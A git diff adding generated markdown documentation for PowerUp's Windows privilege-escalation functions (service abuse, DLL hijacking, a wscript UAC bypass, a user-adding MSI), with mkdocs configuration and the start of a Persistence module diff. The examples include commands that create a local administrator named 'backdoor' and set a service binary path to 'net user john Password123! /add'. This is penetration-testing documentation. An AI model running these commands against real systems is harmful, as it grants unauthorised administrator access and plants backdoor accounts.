(All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.ServiceBinary.Installed + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Invoke-PrivescAudit.md b/docs/Privesc/Invoke-PrivescAudit.md new file mode 100755 index 0000000..7110962 --- /dev/null +++ b/docs/Privesc/Invoke-PrivescAudit.md @@ -0,0 +1,63 @@ +# Invoke-PrivescAudit + +## SYNOPSIS +Executes all functions that check for various Windows privilege escalation opportunities. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Invoke-PrivescAudit [-HTMLReport] +``` + +## DESCRIPTION +Executes all functions that check for various Windows privilege escalation opportunities. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Invoke-PrivescAudit +``` + +Runs all escalation checks and outputs a status report for discovered issues. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Invoke-PrivescAudit -HTMLReport +``` + +Runs all escalation checks and outputs a status report to SYSTEM.username.html +detailing any discovered issues. + +## PARAMETERS + +### -HTMLReport +Switch. +Write a HTML version of the report to SYSTEM.username.html. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### System.String + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Invoke-ServiceAbuse.md b/docs/Privesc/Invoke-ServiceAbuse.md new file mode 100755 index 0000000..8d493d7 --- /dev/null +++ b/docs/Privesc/Invoke-ServiceAbuse.md @@ -0,0 +1,194 @@ +# Invoke-ServiceAbuse + +## SYNOPSIS +Abuses a function the current user has configuration rights on in order +to add a local administrator or execute a custom command. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ServiceDetail, Set-ServiceBinaryPath + +## SYNTAX + +``` +Invoke-ServiceAbuse [-Name] [-UserName ] [-Password ] [-LocalGroup ] + [-Credential ] [-Command ] [-Force] +``` + +## DESCRIPTION +Takes a service Name or a ServiceProcess.ServiceController on the pipeline that the current +user has configuration modification rights on and executes a series of automated actions to +execute commands as SYSTEM. +First, the service is enabled if it was set as disabled and the +original service binary path and configuration state are preserved. +Then the service is stopped +and the Set-ServiceBinaryPath function is used to set the binary (binPath) for the service to a +series of commands, the service is started, stopped, and the next command is configured. +After +completion, the original service configuration is restored and a custom object is returned +that captures the service abused and commands run. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Invoke-ServiceAbuse -Name VulnSVC +``` + +Abuses service 'VulnSVC' to add a localuser "john" with password +"Password123! +to the machine and local administrator group + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Service VulnSVC | Invoke-ServiceAbuse +``` + +Abuses service 'VulnSVC' to add a localuser "john" with password +"Password123! +to the machine and local administrator group + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Invoke-ServiceAbuse -Name VulnSVC -UserName "TESTLAB\john" +``` + +Abuses service 'VulnSVC' to add a the domain user TESTLAB\john to the +local adminisrtators group. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Invoke-ServiceAbuse -Name VulnSVC -UserName backdoor -Password password -LocalGroup "Power Users" +``` + +Abuses service 'VulnSVC' to add a localuser "backdoor" with password +"password" to the machine and local "Power Users" group + +### -------------------------- EXAMPLE 5 -------------------------- +``` +Invoke-ServiceAbuse -Name VulnSVC -Command "net ..." +``` + +Abuses service 'VulnSVC' to execute a custom command. + +## PARAMETERS + +### -Name +An array of one or more service names to abuse. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: ServiceName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -UserName +The \[domain\\\]username to add. +If not given, it defaults to "john". +Domain users are not created, only added to the specified localgroup. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: John +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Password +The password to set for the added user. +If not given, it defaults to "Password123!" + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Password123! +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LocalGroup +Local group name to add the user to (default of 'Administrators'). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Administrators +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object specifying the user/password to add. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Command +Custom command to execute instead of user creation. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Force +Switch. +Force service stopping, even if other services are dependent. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.AbusedService + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Invoke-WScriptUACBypass.md b/docs/Privesc/Invoke-WScriptUACBypass.md new file mode 100755 index 0000000..f9eeb8d --- /dev/null +++ b/docs/Privesc/Invoke-WScriptUACBypass.md @@ -0,0 +1,85 @@ +# Invoke-WScriptUACBypass + +## SYNOPSIS +Performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe. + +Author: Matt Nelson (@enigma0x3), Will Schroeder (@harmj0y), Vozzie +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Invoke-WScriptUACBypass [-Command] [-WindowStyle ] +``` + +## DESCRIPTION +Drops wscript.exe and a custom manifest into C:\Windows and then proceeds to execute +VBScript using the wscript executable with the new manifest. +The VBScript executed by +C:\Windows\wscript.exe will run elevated. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +" +``` + +Launches the specified PowerShell encoded command in high-integrity. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Invoke-WScriptUACBypass -Command cmd.exe -WindowStyle 'Visible' +``` + +Spawns a high integrity cmd.exe. + +## PARAMETERS + +### -Command +The shell command you want wscript.exe to run elevated. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: CMD + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -WindowStyle +Whether to display or hide the window for the executed '-Command X'. +Accepted values are 'Hidden' and 'Normal'/'Visible. +Default is 'Hidden'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Hidden +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html +https://github.com/Vozzie/uacscript +https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-WScriptBypassUAC.ps1](http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html +https://github.com/Vozzie/uacscript +https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-WScriptBypassUAC.ps1) + diff --git a/docs/Privesc/Restore-ServiceBinary.md b/docs/Privesc/Restore-ServiceBinary.md new file mode 100755 index 0000000..a88fc29 --- /dev/null +++ b/docs/Privesc/Restore-ServiceBinary.md @@ -0,0 +1,87 @@ +# Restore-ServiceBinary + +## SYNOPSIS +Restores a service binary backed up by Install-ServiceBinary. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ServiceDetail, Get-ModifiablePath + +## SYNTAX + +``` +Restore-ServiceBinary [-Name] [[-BackupPath] ] +``` + +## DESCRIPTION +Takes a service Name or a ServiceProcess.ServiceController on the pipeline and +checks for the existence of an "OriginalServiceBinary.exe.bak" in the service +binary location. +If it exists, the backup binary is restored to the original +binary path. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Restore-ServiceBinary -Name VulnSVC +``` + +Restore the original binary for the service 'VulnSVC'. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Service VulnSVC | Restore-ServiceBinary +``` + +Restore the original binary for the service 'VulnSVC'. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Restore-ServiceBinary -Name VulnSVC -BackupPath 'C:\temp\backup.exe' +``` + +Restore the original binary for the service 'VulnSVC' from a custom location. + +## PARAMETERS + +### -Name +The service name to restore a binary for. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ServiceName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -BackupPath +Optional manual path to the backup binary. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.ServiceBinary.Installed + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Set-ServiceBinaryPath.md b/docs/Privesc/Set-ServiceBinaryPath.md new file mode 100755 index 0000000..b39926f --- /dev/null +++ b/docs/Privesc/Set-ServiceBinaryPath.md @@ -0,0 +1,92 @@ +# Set-ServiceBinaryPath + +## SYNOPSIS +Sets the binary path for a service to a specified value. + +Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: PSReflect + +## SYNTAX + +``` +Set-ServiceBinaryPath [-Name] [-Path] +``` + +## DESCRIPTION +Takes a service Name or a ServiceProcess.ServiceController on the pipeline and first opens up a +service handle to the service with ConfigControl access using the GetServiceHandle +Win32 API call. +ChangeServiceConfig is then used to set the binary path (lpBinaryPathName/binPath) +to the string value specified by binPath, and the handle is closed off. + +Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a +Dacl field to each object. +It does this by opening a handle with ReadControl for the +service with using the GetServiceHandle Win32 API call and then uses +QueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Set-ServiceBinaryPath -Name VulnSvc -Path 'net user john Password123! /add' +``` + +Sets the binary path for 'VulnSvc' to be a command to add a user. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Service VulnSvc | Set-ServiceBinaryPath -Path 'net user john Password123! /add' +``` + +Sets the binary path for 'VulnSvc' to be a command to add a user. + +## PARAMETERS + +### -Name +An array of one or more service names to set the binary path for. +Required. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: ServiceName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Path +The new binary path (lpBinaryPathName) to set for the specified service. +Required. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: BinaryPath, binPath + +Required: True +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### System.Boolean + +$True if configuration succeeds, $False otherwise. + +## NOTES + +## RELATED LINKS + +[https://msdn.microsoft.com/en-us/library/windows/desktop/ms681987(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/windows/desktop/ms681987(v=vs.85).aspx) + diff --git a/docs/Privesc/Test-ServiceDaclPermission.md b/docs/Privesc/Test-ServiceDaclPermission.md new file mode 100755 index 0000000..2251a11 --- /dev/null +++ b/docs/Privesc/Test-ServiceDaclPermission.md @@ -0,0 +1,112 @@ +# Test-ServiceDaclPermission + +## SYNOPSIS +Tests one or more passed services or service names against a given permission set, +returning the service objects where the current user have the specified permissions. + +Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: Add-ServiceDacl + +## SYNTAX + +``` +Test-ServiceDaclPermission [-Name] [-Permissions ] [-PermissionSet ] +``` + +## DESCRIPTION +Takes a service Name or a ServiceProcess.ServiceController on the pipeline, and first adds +a service Dacl to the service object with Add-ServiceDacl. +All group SIDs for the current +user are enumerated services where the user has some type of permission are filtered. +The +services are then filtered against a specified set of permissions, and services where the +current user have the specified permissions are returned. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-Service | Test-ServiceDaclPermission +``` + +Return all service objects where the current user can modify the service configuration. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Service | Test-ServiceDaclPermission -PermissionSet 'Restart' +``` + +Return all service objects that the current user can restart. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Test-ServiceDaclPermission -Permissions 'Start' -Name 'VulnSVC' +``` + +Return the VulnSVC object if the current user has start permissions. + +## PARAMETERS + +### -Name +An array of one or more service names to test against the specified permission set. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: ServiceName, Service + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Permissions +A manual set of permission to test again. +One of:'QueryConfig', 'ChangeConfig', 'QueryStatus', +'EnumerateDependents', 'Start', 'Stop', 'PauseContinue', 'Interrogate', UserDefinedControl', +'Delete', 'ReadControl', 'WriteDac', 'WriteOwner', 'Synchronize', 'AccessSystemSecurity', +'GenericAll', 'GenericExecute', 'GenericWrite', 'GenericRead', 'AllAccess' + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -PermissionSet +A pre-defined permission set to test a specified service against. +'ChangeConfig', 'Restart', or 'AllAccess'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: ChangeConfig +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### ServiceProcess.ServiceController + +## NOTES + +## RELATED LINKS + +[https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/](https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/) + diff --git a/docs/Privesc/Write-HijackDll.md b/docs/Privesc/Write-HijackDll.md new file mode 100755 index 0000000..d38e3e7 --- /dev/null +++ b/docs/Privesc/Write-HijackDll.md @@ -0,0 +1,173 @@ +# Write-HijackDll + +## SYNOPSIS +Patches in the path to a specified .bat (containing the specified command) into a +pre-compiled hijackable C++ DLL writes the DLL out to the specified ServicePath location. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Write-HijackDll [-DllPath] [[-Architecture] ] [[-BatPath] ] [[-UserName] ] + [[-Password] ] [[-LocalGroup] ] [[-Credential] ] [[-Command] ] +``` + +## DESCRIPTION +First builds a self-deleting .bat file that executes the specified -Command or local user, +to add and writes the.bat out to -BatPath. +The BatPath is then patched into a pre-compiled +C++ DLL that is built to be hijackable by the IKEEXT service. +There are two DLLs, one for +x86 and one for x64, and both are contained as base64-encoded strings. +The DLL is then +written out to the specified OutputFile. + +## EXAMPLES + +### Example 1 +``` +PS C:\> {{ Add example code here }} +``` + +{{ Add example description here }} + +## PARAMETERS + +### -DllPath +File name to write the generated DLL out to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Architecture +The Architecture to generate for the DLL, x86 or x64. +If not specified, PowerUp +will try to automatically determine the correct architecture. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -BatPath +Path to the .bat for the DLL to launch. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 3 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserName +The \[domain\\\]username to add. +If not given, it defaults to "john". +Domain users are not created, only added to the specified localgroup. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 4 +Default value: John +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Password +The password to set for the added user. +If not given, it defaults to "Password123!" + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 5 +Default value: Password123! +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LocalGroup +Local group name to add the user to (default of 'Administrators'). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 6 +Default value: Administrators +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object specifying the user/password to add. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: 7 +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Command +Custom command to execute instead of user creation. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 8 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.HijackableDLL + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Write-ServiceBinary.md b/docs/Privesc/Write-ServiceBinary.md new file mode 100755 index 0000000..7d588a5 --- /dev/null +++ b/docs/Privesc/Write-ServiceBinary.md @@ -0,0 +1,191 @@ +# Write-ServiceBinary + +## SYNOPSIS +Patches in the specified command to a pre-compiled C# service executable and +writes the binary out to the specified ServicePath location. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Write-ServiceBinary [-Name] [-UserName ] [-Password ] [-LocalGroup ] + [-Credential ] [-Command ] [-Path ] +``` + +## DESCRIPTION +Takes a pre-compiled C# service binary and patches in the appropriate commands needed +for service abuse. +If a -UserName/-Password or -Credential is specified, the command +patched in creates a local user and adds them to the specified -LocalGroup, otherwise +the specified -Command is patched in. +The binary is then written out to the specified +-ServicePath. +Either -Name must be specified for the service, or a proper object from +Get-Service must be passed on the pipeline in order to patch in the appropriate service +name the binary will be running under. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Write-ServiceBinary -Name VulnSVC +``` + +Writes a service binary to service.exe in the local directory for VulnSVC that +adds a local Administrator (john/Password123!). + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Service VulnSVC | Write-ServiceBinary +``` + +Writes a service binary to service.exe in the local directory for VulnSVC that +adds a local Administrator (john/Password123!). + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Write-ServiceBinary -Name VulnSVC -UserName 'TESTLAB\john' +``` + +Writes a service binary to service.exe in the local directory for VulnSVC that adds +TESTLAB\john to the Administrators local group. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Write-ServiceBinary -Name VulnSVC -UserName backdoor -Password Password123! +``` + +Writes a service binary to service.exe in the local directory for VulnSVC that +adds a local Administrator (backdoor/Password123!). + +### -------------------------- EXAMPLE 5 -------------------------- +``` +Write-ServiceBinary -Name VulnSVC -Command "net ..." +``` + +Writes a service binary to service.exe in the local directory for VulnSVC that +executes a custom command. + +## PARAMETERS + +### -Name +The service name the EXE will be running under. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ServiceName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -UserName +The \[domain\\\]username to add. +If not given, it defaults to "john". +Domain users are not created, only added to the specified localgroup. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: John +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Password +The password to set for the added user. +If not given, it defaults to "Password123!" + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Password123! +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LocalGroup +Local group name to add the user to (default of 'Administrators'). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Administrators +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object specifying the user/password to add. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Command +Custom command to execute instead of user creation. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Path +Path to write the binary out to, defaults to 'service.exe' in the local directory. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: "$(Convert-Path .)\service.exe" +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.ServiceBinary + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Write-UserAddMSI.md b/docs/Privesc/Write-UserAddMSI.md new file mode 100755 index 0000000..cac959d --- /dev/null +++ b/docs/Privesc/Write-UserAddMSI.md @@ -0,0 +1,56 @@ +# Write-UserAddMSI + +## SYNOPSIS +Writes out a precompiled MSI installer that prompts for a user/group addition. +This function can be used to abuse Get-RegistryAlwaysInstallElevated. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Write-UserAddMSI [[-Path] ] +``` + +## DESCRIPTION +Writes out a precompiled MSI installer that prompts for a user/group addition. +This function can be used to abuse Get-RegistryAlwaysInstallElevated. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Write-UserAddMSI +``` + +Writes the user add MSI to the local directory. + +## PARAMETERS + +### -Path +{{Fill Path Description}} + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ServiceName + +Required: False +Position: 1 +Default value: UserAdd.msi +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.UserAddMSI + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/index.md b/docs/Privesc/index.md new file mode 100644 index 0000000..836e674 --- /dev/null +++ b/docs/Privesc/index.md @@ -0,0 +1,55 @@ +## PowerUp + +PowerUp aims to be a clearinghouse of common Windows privilege escalation +vectors that rely on misconfigurations. + +Running Invoke-AllChecks will output any identifiable vulnerabilities along +with specifications for any abuse functions. The -HTMLReport flag will also +generate a COMPUTER.username.html version of the report. + +Author: @harmj0y +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + + +### Token/Privilege Enumeration/Abuse: + Get-ProcessTokenGroup - returns all SIDs that the current token context is a part of, whether they are disabled or not + Get-ProcessTokenPrivilege - returns all privileges for the current (or specified) process ID + Enable-Privilege - enables a specific privilege for the current process + +### Service Enumeration/Abuse: + Test-ServiceDaclPermission - tests one or more passed services or service names against a given permission set + Get-UnquotedService - returns services with unquoted paths that also have a space in the name + Get-ModifiableServiceFile - returns services where the current user can write to the service binary path or its config + Get-ModifiableService - returns services the current user can modify + Get-ServiceDetail - returns detailed information about a specified service + Set-ServiceBinaryPath - sets the binary path for a service to a specified value + Invoke-ServiceAbuse - modifies a vulnerable service to create a local admin or execute a custom command + Write-ServiceBinary - writes out a patched C# service binary that adds a local admin or executes a custom command + Install-ServiceBinary - replaces a service binary with one that adds a local admin or executes a custom command + Restore-ServiceBinary - restores a replaced service binary with the original executable + +### DLL Hijacking: + Find-ProcessDLLHijack - finds potential DLL hijacking opportunities for currently running processes + Find-PathDLLHijack - finds service %PATH% DLL hijacking opportunities + Write-HijackDll - writes out a hijackable DLL + +### Registry Checks: + Get-RegistryAlwaysInstallElevated - checks if the AlwaysInstallElevated registry key is set + Get-RegistryAutoLogon - checks for Autologon credentials in the registry + Get-ModifiableRegistryAutoRun - checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns + +### Miscellaneous Checks: + Get-ModifiableScheduledTaskFile - find schtasks with modifiable target files + Get-UnattendedInstallFile - finds remaining unattended installation files + Get-Webconfig - checks for any encrypted web.config strings + Get-ApplicationHost - checks for encrypted application pool and virtual directory passwords + Get-SiteListPassword - retrieves the plaintext passwords for any found McAfee's SiteList.xml files + Get-CachedGPPPassword - checks for passwords in cached Group Policy Preferences files + +### Other Helpers/Meta-Functions: + Get-ModifiablePath - tokenizes an input string and returns the files in it the current user can modify + Write-UserAddMSI - write out a MSI installer that prompts for a user to be added + Invoke-WScriptUACBypass - performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe + Invoke-PrivescAudit - runs all current escalation checks and returns a report (formerly Invoke-AllChecks) diff --git a/docs/index.md b/docs/index.md index 67ddcbc..8cd53ea 100644 --- a/docs/index.md +++ b/docs/index.md @@ -61,6 +61,7 @@ Cause general mayhem with PowerShell. Tools to help with escalating privileges on a target, including PowerUp. PowerUp - Clearing house of common privilege escalation checks, along with some weaponization vectors. + Get-System - GetSystem functionality inspired by Meterpreter's getsystem ### Recon Tools to aid in the reconnaissance phase of a penetration test, including PowerView. diff --git a/mkdocs.yml b/mkdocs.yml index accd72b..8b78d98 100644 --- a/mkdocs.yml +++ b/mkdocs.yml @@ -85,3 +85,37 @@ pages: - Get-HttpStatus: 'Recon/Get-HttpStatus.md' - Invoke-Portscan: 'Recon/Invoke-Portscan.md' - Invoke-ReverseDnsLookup: 'Recon/Invoke-ReverseDnsLookup.md' +- Privesc: + - About: 'Privesc/index.md' + - Functions: + - Get-ModifiablePath: 'Privesc/Get-ModifiablePath.md' + - Get-ProcessTokenGroup: 'Privesc/Get-ProcessTokenGroup.md' + - Get-ProcessTokenPrivilege: 'Privesc/Get-ProcessTokenPrivilege.md' + - Enable-Privilege: 'Privesc/Enable-Privilege.md' + - Add-ServiceDacl: 'Privesc/Add-ServiceDacl.md' + - Set-ServiceBinaryPath: 'Privesc/Set-ServiceBinaryPath.md' + - Test-ServiceDaclPermission: 'Privesc/Test-ServiceDaclPermission.md' + - Get-UnquotedService: 'Privesc/Get-UnquotedService.md' + - Get-ModifiableServiceFile: 'Privesc/Get-ModifiableServiceFile.md' + - Get-ModifiableService: 'Privesc/Get-ModifiableService.md' + - Get-ServiceDetail: 'Privesc/Get-ServiceDetail.md' + - Invoke-ServiceAbuse: 'Privesc/Invoke-ServiceAbuse.md' + - Write-ServiceBinary: 'Privesc/Write-ServiceBinary.md' + - Install-ServiceBinary: 'Privesc/Install-ServiceBinary.md' + - Restore-ServiceBinary: 'Privesc/Restore-ServiceBinary.md' + - Find-ProcessDLLHijack: 'Privesc/Find-ProcessDLLHijack.md' + - Find-PathDLLHijack: 'Privesc/Find-PathDLLHijack.md' + - Write-HijackDll: 'Privesc/Write-HijackDll.md' + - Get-RegistryAlwaysInstallElevated: 'Privesc/Get-RegistryAlwaysInstallElevated.md' + - Get-RegistryAutoLogon: 'Privesc/Get-RegistryAutoLogon.md' + - Get-ModifiableRegistryAutoRun: 'Privesc/Get-ModifiableRegistryAutoRun.md' + - Get-ModifiableScheduledTaskFile: 'Privesc/Get-ModifiableScheduledTaskFile.md' + - Get-UnattendedInstallFile: 'Privesc/Get-UnattendedInstallFile.md' + - Get-WebConfig: 'Privesc/Get-WebConfig.md' + - Get-ApplicationHost: 'Privesc/Get-ApplicationHost.md' + - Get-SiteListPassword: 'Privesc/Get-SiteListPassword.md' + - Get-CachedGPPPassword: 'Privesc/Get-CachedGPPPassword.md' + - Write-UserAddMSI: 'Privesc/Write-UserAddMSI.md' + - Invoke-WScriptUACBypass: 'Privesc/Invoke-WScriptUACBypass.md' + - Invoke-PrivescAudit: 'Privesc/Invoke-PrivescAudit.md' + - Get-System: 'Privesc/Get-System.md' -- cgit v1.2.3 From cf444398cab3f77f9b8cc7bd23e3e506621eb150 Mon Sep 17 00:00:00 2001 From: HarmJ0y Date: Wed, 14 Dec 2016 18:24:33 -0500 Subject: For ./Persistence/ : -PSScriptAnalyzering -Tweaking of synopsis blocks in order to support platyPS -Code standardization -Generated docs --- Persistence/Persistence.psm1 | 278 ++++++++++++---------- docs/Persistence/Add-Persistence.md | 227 ++++++++++++++++++ docs/Persistence/Get-SecurityPackage.md | 37 +++ docs/Persistence/Install-SSP.md | 60 +++++ docs/Persistence/New-ElevatedPersistenceOption.md | 235 ++++++++++++++++++ docs/Persistence/New-UserPersistenceOption.md | 179 ++++++++++++++ docs/index.md | 2 +- mkdocs.yml | 7 + 8 files changed, 894 insertions(+), 131 deletions(-) create mode 100755 docs/Persistence/Add-Persistence.md create mode 100755 docs/Persistence/Get-SecurityPackage.md create mode 100755 docs/Persistence/Install-SSP.md create mode 100755 docs/Persistence/New-ElevatedPersistenceOption.md create mode 100755 docs/Persistence/New-UserPersistenceOption.md (limited to 'docs/index.md') diff --git a/Persistence/Persistence.psm1 b/Persistence/Persistence.psm1 index 0861af6..7e4bbb9 100644 --- a/Persistence/Persistence.psm1 +++ b/Persistence/Persistence.psm1 @@ -3,84 +3,86 @@ function New-ElevatedPersistenceOption <# .SYNOPSIS - Configure elevated persistence options for the Add-Persistence function. - - PowerSploit Function: New-ElevatedPersistenceOption - Author: Matthew Graeber (@mattifestation) - License: BSD 3-Clause - Required Dependencies: None - Optional Dependencies: None - +Configure elevated persistence options for the Add-Persistence function. + +PowerSploit Function: New-ElevatedPersistenceOption +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + .DESCRIPTION - New-ElevatedPersistenceOption allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: permanent WMI subscription, scheduled task, and registry. +New-ElevatedPersistenceOption allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: permanent WMI subscription, scheduled task, and registry. .PARAMETER PermanentWMI - Persist via a permanent WMI event subscription. 